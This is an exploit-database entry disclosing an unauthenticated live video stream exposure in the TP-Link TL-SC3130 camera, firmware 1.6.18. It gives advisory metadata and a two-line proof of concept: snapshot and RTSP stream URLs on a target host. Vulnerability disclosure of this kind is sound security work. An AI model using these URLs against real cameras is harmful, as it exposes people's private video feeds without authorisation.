TP-Link TL-SC3130 1.6.18 - RTSP Stream Disclosure Vulnerability

2018-10-17T00:00:00
ID 1337DAY-ID-31360
Type zdt
Reporter LiquidWorm
Modified 2018-10-17T00:00:00

Description

Exploit for hardware platform in category web applications

                                        
                                            # Exploit Title: TP-Link TL-SC3130 1.6.18 - RTSP Stream Disclosure
# Author: Gjoko 'LiquidWorm' Krstic @zeroscience
# Vendor: TP-LINK Technologies Co., Ltd.
# Product web page: http://www.tp-link.com
# Affected version: 1.6.18P12_121101
# Tested on: Boa/0.94.14rc21
# CVE: N/A
# References:
# Advisory ID: ZSL-2018-5497
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5497.php
 
Desc: The TP-Link TL-SC3130 suffers from an unauthenticated and unauthorized
live RTSP stream disclosure.
 
# PoC:
 
http://TARGET/jpg/image.jpg
rtsp://TARGET:554/video.3gp

#  0day.today [2018-10-18]  #